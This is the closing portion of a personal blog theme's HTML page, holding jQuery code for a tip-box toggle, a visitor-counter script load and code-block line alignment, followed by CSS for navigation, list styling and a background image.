            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script><style>
    
    
    .nav {
        width: 572px;
    }
    .nav.fullscreen {
        margin-left: -572px;
    }
    .nav-left {
        width: 150px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    
    #post .pjax article .article-entry>ol, #post .pjax article .article-entry>ul, #post .pjax article>ol, #post .pjax article>ul{
        border: #e2dede solid 1px;
        border-radius: 10px;
        padding: 10px 32px 10px 56px;
    }
    #post .pjax article .article-entry li>ol, #post .pjax article .article-entry li>ul,#post .pjax article li>ol, #post .pjax article li>ul{
        padding-top: 5px;
        padding-bottom: 5px;
    }
    #post .pjax article .article-entry>ol>li, #post .pjax article .article-entry>ul>li,#post .pjax article>ol>li, #post .pjax article>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    #post .pjax article .article-entry li>ol>li, #post .pjax article .article-entry li>ul>li,#post .pjax article li>ol>li, #post .pjax article li>ul>li{
        margin-bottom: auto;
        margin-left: auto;
    }
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.3;
        background: url("https://img-blog.csdnimg.cn/20200726174858546.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    

    
</style></html>